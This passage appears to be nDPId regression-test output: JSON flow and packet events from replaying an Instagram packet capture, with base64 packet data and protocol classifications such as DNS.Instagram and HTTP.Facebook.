Yh\/BrGK2ISAtFCkh5uw9+EN15dd79TckDZ5M\/1IXL8vqbu\/hTG\/JfucZfR3dz3L3c+OhdygQW8UzKVOFvvFE3uZQnd322DAH7zC3LRHAXbCjqHBmwf2whhpegjLfm6RfL+z+IzmMokA9e2qfVhZ6xYQdwpjxowXA\/a0hFuEIYBqgg2RBxOTW9B0lNexKZj7L7myCIQt5asMs3OULjIFOSJmLxUIk3Q37w4ymEfVUM4Q7YQrd2Q7D7oXQeE3jsBBmSxiRovqahgnBN4hvIeCZZMLY1uvosfkYR3vNLSiHuKZeam\/RFQJomYqTPcrO3yya\/L8n\/bJvfwlRzHWNuu76VGEBOTSmIQrzPwlvzfa91FS9xmltfjK8v2vivjQ79d9wnDovM7E8heMjng\/L76qTSur9Xu++liqI9lESwcV36\/iMv+UhBAvwlNl9yFOXzTHExcfuKxDjy2WcT\/yjID\/XwdhLUHYsgQ9jzrKZiitJYPrb03G\/4eqDHUUFspftslQp6lFXZbtMgT+PtX+iul7L97VDMHXGdwaI8TzZ6\/jXre8vnY2F+CmIZKNEjnJpMB39UHX\/p7\/3FfZpIUwHcB3IlgFw2RAH5dbcIGzC1nhuJYVIQctqJ04wUFMG9bZhr46HZ73BXAQuUhUW68mxXOEcSUvu6IiD4944qVAoG\/m5vfXCzer8TXXbtxGJy\/lJZWKxmuOzEdM\/69tZAld3d7Oi+E\/\/wSXdP1F9r8RHsvFnMaKa\/Gb3fFq120z5cfUI5ObITs4O5x1e\/k2SP4T55SQ1l\/\/E7jbfd3y\/W+K4YanQb4PNdLvnwtOUEVU10v172Jve733E93FYrd8\/r7COigUu\/j7zMkQoWBxC6yXxRL8fBFpX1\/jifjboOb9QR4q79l+S7kBZXF3dpMduttP55\/mpWYFflzvfd\/Hx+Ie9ijit30tVfYliZvDoVqX8Iibo18xmX2SURsTLcDlv6t9hYNRdUnFiX1r9e4\/4uD+iVcRBUU8hc0fHv5tu\/ghpv97F5dOxeZj2CiEjpYqtM2N6y9Ex9X2v34njvtqIprtcVwGtsEjAY8n2yd95fX6LnY6678J3vfovd9+pLl7ZMl\/\/3mgopvtAOiqdmdl8m1KgVxW1IDqxnD5Yq+7jVsvs"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1436720950910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720950910,"pkt":"ABsv8H60QPMIw47hCABFAAA0TetAAEAGtojAqABnHw1WNONoAFAuGbTPoOL3GoAQH8w2dwAAAQEICgAD\/xATwkKT"}
02380{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1436720950911,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950911,"pkt":"QPMIw47hABsv8H60CABFAAWqgMpAAFYGaDMfDVY0wKgAZwBQ42ig4vyQLhm0z4AYADulrQAAAQEIChPCQpYAA\/8JIuSEmFKcHvUO79IuA4AtgLK1ooHfe\/xvCx6EanjcjDye5qfYfg99btIFMlfpEyS0+WXx48YQQIBKyWOQayb5WbhMWSz8Ru7MV\/a5RJtywzl84iv9BLl6PdqXz3kxPZm4yY8HdjILE3vdfyWVN0pVFaKK+f+Osc32N80bLx0naY6\/StT9w4Neeouf2Tn\/vkhhHb5a5vAV9Sx5efQ\/Fatqq174n5ea7v9ir3vf4yK3Pnlx3v3fywdfv\/ld3jdWI6CQY9xByO962aeABxBaD0Ff8vq65YOluUkGW\/xG5p7nyyq1NumgVeaWXPx2O3qpBCTyam4Mj9KNa9CLu77T788mzfZZLswHVfevJGWxpG6er55a4je67Jde+KzsbHfq771q7M2+z\/WWJw+2E3Gv8+Ffd+tBC77nzd2bXmu\/clj6qf9o8rFbG7XiKrvvv6XxVyXfvsflY+OxHlh7gk3Z3+CHdjx7fieVi8bxm781fQKvN8eNlagx6Pt3\/NOSAfXLBsZ085Sli5c\/HVLg4fEITYcZuYfT1VtMLoUR\/it2aocyhvwSZMTvD5t065r2N7JUsZycS8vq283r4S3bSl8\/xBhG2Ci5YyWnWnN8pxV7z+JfURJd7rip6XefL+Ju6T2Uxe8n5uUueW8j7FWxyhWWeGt2YWoIb6BgT6P7uCHnx\/HwXcNPzZiXBYPY6liIwioP5BO9O7zdXvrl6Ju71WJu93dF9e+W764JLl\/1aJkh+a8yX4S4lMe7dI+73eX7WiDQUaZve75ZfLkLUJX2tpOX0s4hxEi8nbq2h\/\/mvflq9RBfYRrfTdMUcVv5e78i9rwQyT\/Sl\/1zQY9T8g\/Uty51S6PL8o6JLB8VrQkT8ugJnmu83Eyez2e5Qy1+W7Aw4JHINbEb3Lj395YP7YvjhcMBXfvXJ44Z+Ixmnuj5fXvqryZ8aIvNfJRrTESolEZ4VaoKtE96vFFfwld9u321frxC3vvk10K23e7KuXiuSPeX78kEfFYr7eXpJxFpezOY6TshceqnnmzDJNaHyWEjeK+xtg7siFQxNUarW6raVTT\/fwlt3m1+qIhVuJsRCxFdbFXtQf9\/RdIuTCv1R7IUVly5mtgVW\/5h5d378ta7e\/5QkWm71LXLL\/Y\/yuCATBPFbu75ZM1tF4Xr2urFPeZ1jp6PYqu0ysRtkUSKOnvSvJ9F0HEq\/Rr4RDbTxd+7uU\/Q0X5NSa4riJq7\/YqaIUW4dNr2MWX30vRqr09mqvna6y\/VdiohYPHuWzpM\/5V791hHspd591pkzSvTJiOetcEmlGTx05fm5r+E5WPIYg3+Ld5OiDJCb38Xd9ysF92RKCKwntddXfaT3LP\/4K7yaDr4HbV6D7vh8Ru7u\/ShH0gWZxKK93e\/u7nhshKX\/8u99ZHz6WcFOZh7FbiudjfLamk58fUJd3H2j6sTr\/E4xQhYhPxokXSHH53b6EIn4I8kGvoiAAQAAAAAAACAYAavAAAAAgECXIEAAAAAAAAAAAAAAAACAAWcAAAAZwAAAAUAAQABAAAAAIBgBrAAAAACAQJcAQAAAAAAAAAAAAAAAAIABZwAAABnAAAFoQABAAEAAAAAgGAGsQAAAAIBAlwBAAAAAAAAAAAAAAAAAgAFnAAAAGcAAAs9AAEAAQAAAACA4AayAAAAAgECXEEAAAAAAAAAAAAAAAACAAFNAAAAZwAAENkAAQABARggBwEYIAcAABVgQZrjwgqFiDcfxdYWFjNTGhc\/+kWorCzCP06aQacK5fU3p2bDv4QjGkzRtJEnNbVPk\/10ykQi0ZJ4s6VFQ2Ko59C0bD2u1KUtTyS\/\/DlRe1HhoMlOd6CAkkRYQkwPPOx2Ho6SCe9GzaPNROS+"}
00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}}
00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952553,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720952553,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952553,"pkt":"QPMIw47hABsv8H60CABFAAW+RXVAADMGTWwCFuwzwKgAZwBQrHcqB5rC6nVWeIAQAeYA6gAAAQEICmBlKDgAA\/+vNN9ULewTHBOFuxeelHDOvSnlSV1MyHTuCPSU99J+Rb8TuXzL6L8kVMT9JeX\/AEeHJMKvc8yfZQDY5nhAsWaIx3cLbY2ubZRDNurbaUASgAZ45AKigq45hruCoLni5pLmg59eiPd\/MiN87txVNMyFgkWsWfkcvPvLq3ncGqOJteWDTNpm8JnDNe\/V0S2KHy+GaSkVk8YYmWOQdL4xuwexnBqduXqVc8IuuI9MY+Zt8cnTPcsfLLIlpNfPzE+aRdsInsLztgb98N0mNzOHWHNTZrWKQPr9F5EE8pK7KRl773oe+7TTr1byuTp17xSTo5toqt17OaKtyATyBsMufY15yTPDfHSZYsAADIDSioIAAAHiqKF1TXzn1tX21U6idxttVoiynCqd8u3uesClb\/XTWQXOtPYUXP50lMJRzX9QM7C64zEeROD4ZaaRjli0mWIjfY1adjPenj65KGzqNXJTVghI+6I9UuSYsusH3FlxFno1c9JW3qbWRHfo32lBRAAGeChkqKC5IoYXnRl6Z3L5dCnLn26mSNOSOlqcea5o+UReR652+3d2\/Dab0zb9PXGqPSSLVDbNYRN6MtmpYbJEJLFdJ2RaURdiZY5h0OrU5h7IeY888nVsXnwm4oxv7JWfA68vLc8ehxYrmuOvDGouaBzaCTVP8+zXrnlnrxCWO9ezKKfpVjom7FpO6KTzNl60JdWhqz19c1yubV3UpRimqVV2W9Iuz4HPYBS04ZbGvOuvLXvjiZYsyxAFADSAAAIAHiqKCLcMvDzel9taKZLs5gp0t2Sh58L9ypUAXrhU0aeiss785JfFQgziXCyntnoKqRxzXlrlhljpCKihlu1P7THj6681RUYywmYQzKyhFbllawrlLFUK21TYahBMm4bB0c\/Q0qorQAApkAqZAqooYd7fNpcf2zJkmmfqN4IOKohvY2dlqWGThFbWF\/iVS78WnnJ2uDHuZI98fVGcac2Zm9mcm1UZY5ht7uDaF69Ec7stO3DjzT4G5waWu1vkbTUs3N04NR5d+uk9NE0xVVXqfWMDHPBz3TyJ2pj1SeiHvpcNbNaNfVk2d++zGVKltAVHjbncFMYehMEedktrQOr+f0lWrmtUm+5kDyFpIAAACABpAAAEADxUAvSVxiQ0ufh6dafDwdvPJvem8y03645umpEvJ0dXO8bOVZrlo6+6HRHb0ou72TKnrj5KPN7\/AOgKGio1hlhcLnqyF3+tvLXsSbkfin2t4tioTO4NYFQ\/cjnql8XXv1hza9+0Ud7jZRwM7yzJxDp5um5UBpRFBRFDJUAyXHIMLhp62c7n0OsJjy0iGfHrFKd3PzhU8hjD\/pFzODc\/Y6udSW9S1xmy97TUsc6rydtdS82Etsi8jjdrKKSuKgmeOTOnu4nJHsh6YHzk6+ZUwTisdkMdqJMzvOrXOshOkK636OrSLZYJJHZcArm2apudeK4tWc27cstemRx+TikdR37SEPju+kLssw2Gc1wOvJ2hIdaYk1zq07Iu2KUuuldIaeHl165wzJM2tQDAAEFA0ACABgAIKiLtm1f2FaZdGxIrg19HJLzj8n4Ypnc+B3T5H9i6KUpcY+86xxUVeVESMl8UPe1Kc82\/VTk3j\/1J5ak58ckqUUUN\/rfyR6eHcXir2n4sx0h9l1nO6iWmGyLxxNiNJu0g3Ybk0hqbHRqCIdPN0XOQitAAKqALljkCrjkGF2Uncud2zD5hCufWAuzR3tSLQmaqnX6OSXbK53hgkuOsgpG7qQpZRqSR+oidlVpZdTrxXdIxxKXxG1ojMpizEzxzZ0OrW7I9gvrG+cnXo1beEccjsojNZyrk6C5qrW4NVKD9vH1VFwxWVxccbqS2Yg5iCSbQN4k01rSK6ZNFZW1N6VuWn84="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952553,"pkt":"ABsv8H60QPMIw47hCABFAAA0quZAAEAG4ITAqABnAhbsM6x3AFDqdVZ4KgegTIAQAtavfwAAAQEICgAD\/7RgZSg4"}
02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1436720952555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952555,"pkt":"QPMIw47hABsv8H60CABFAAW+RXZAADMGTWsCFuwzwKgAZwBQrHcqB6BM6nVWeIAQAeZ8mQAAAQEICmBlKDgAA\/+vtV20fc9mrp1dM1zdmjppSPVtJK34O3VnVq0beVF65xNDXtnFMscw0gMAAAA0IoJBUBRFARUHcs5g82pbGbtawVs6OSKR1bUyvV0dTgqje3NxuXVMt1wlAegfPgme8KPvNkyz2Nzpho206rca8VQBcVDdd9H2q16p8Xe1\/FGG0PnMFm95yjbzbc7y6uXqTNGzWHDjlr1zbmh3aAiPRz9FJQBKIrBUUFyxyAyxUMbqpW7M7s+HSqN8+tay6O9jTtj28wUzIo\/I9c7sc2SRY7SGir2ou5wYpBHamL2VXdh1GOfOiG2KSWK0ZRWURgMc8c2dLwzO6PYryxPPJ14tXbyVLEzu7AiS6csbmt9Otxqax6NG+4uWLSiIMYORwY5GrXsyVyji63ZEef2CRuZlT9tVLFa7rpa4rN2GvKa6elt72n7oBKscxMtLQoy7qN1yh+eGrfONLhtDQAwAAEA0gCRQARQaoCLnm9fzqjnZ3VrTw09XILe19+jPTt59nHFRbU0OOuNydnD0UHny+qEQy39QN7UThl7edlc1nfdBowRUELhmGc+r+yWewvFPtPxXnpDZ1BZmRK8zLPQ38W8W\/X1YhH8M9eufC2d\/AOI79G+kqiNKqKAqKC5YqC5IoY3XSd0Z3Y8akkew1rnv4HkTku3FOmJHHJJtncsjjclx1kPn70JQGkcLY6tNQ0zKJTVjWvXtSZIzLIrSwjEmjQ8c8c2dDq1OqPYLu39fJ1betucGQOPuDRUSXa1cLIpt3N2mddd7Y5VNmsbw2Da2\/vbQiUjZHiNOuRQ2ZSRqRNXXUTanbbp9PbdNN2jY6tLkwRT\/ANjbmOa9UE6Uotjv45c4hUhaamqOkXoyhy4okgDYACCgaABAAIoAADuWUw2fta4zKI7NJxuGVLi29HLne+NvcdlxB1aHHXK2+xtdVSUBfVAg1XrRV5tTjh624ct8i+wPNScORUqMc8Mwy9A0D69VT7xd7V8U53E5jD5vecyw6sYrVuz2BjjtWSJ8nbzbRwtr0xDjG\/RvaURWshFABQXLDMBUUMbnpi4stLLjsnZ8NankEdmWkdab9Muk5DH3nTO4pEwOWG8yo2aQrXLjZXdiuNM0hcyDVu59yGWKyiLXOcZkMeVY7MM2dDs0OqPZPZydXJ159bc5NQmJyqJ1n3Y9HE20x57YdM68dmx\/qZ\/xubZFscff4rR1u4z59Nv1lM66iJZ3x2S6YP1M3XSpWVsVDbdy6xp4Yopxy1ire9NXUDdH5QwofuPrbhV5y8si6MKyVFHiAwABRANQgJRFAEAFRQtucQmaM4mXub5p95Oznuefj688r5I9Io3NRJy4pPrlN+ht2Ku6h\/QXn5ptuulbZCyuVgkTcvo6\/Kxzrz2meGueGWOSOn3F4n9xzTh4w9X+ac6rWdQ67Ljk1S7rhwtJ3i1X+cw4WoLju5KMI5Io4ONbtW2kog1kACqiguWGYCooYz6ATTO7t5HXhw1qebQF2qZdp0cidTv0Xe9srme4048++yBSFg0z42SRtNxxS2IytrHPX1Ij8Vk7Fa5o\/JWGa5s9+xmDrx9qPYDw1O\/L1a89e2KisZlDBefSxSPipRRjkzbpFVvfK43E7weGqLi0clcfofITO4hnvIobM4rryyF2jrvNWRSt60dFarYqu52R3e5aM9G\/a4brng6ZBkiCt702S5fDbSrWoq\/NToyhaKjMRAFBAUANYAkUAEUBFQHbM3h00ta4zJY\/J3bGvNV08O1ZZGZNGYqLS2JzrXKQObG9Rfd54v2gqlsvGjrpY\/dvL3jmUMnMFz0834bMNsda54g8+w\/HfreHt8+XvQ8OvrspC67h\/dIPKIblw4peerNFqYI1OTSaIwPLKqjmzXmxQGlXFQVcVBVxyBVxUM4="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAABZAuBAAEAGAfDAqABnLiFGn+VCAbsSlgM32Tfr4YAYA4n5fAAAAQEICgAD\/7VWGIoUFQMBACAs4KplPbzXnvu9o5LJf4SK8seDxrub6gsxIshtI3HaOA=="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1436720952563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1436720952563,"pkt":"ABsv8H60QPMIw47hCABFAABH\/7VAAEARadHAqABnCAgICGn0ADUAM87BrqQBAAABAAAAAAAACHBob3Rvcy1iAmFrCWluc3RhZ3JhbQNjb20AAAEAAQ=="}
00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"}
00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":745,"packets-processed":743,"total-skipped-flows":0,"total-l4-data-len":515476,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":23,"total-detection-updates":15,"total-updates":0,"current-active-flows":32,"total-active-flows":32,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":158,"global_ts_msec":1568796253770}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
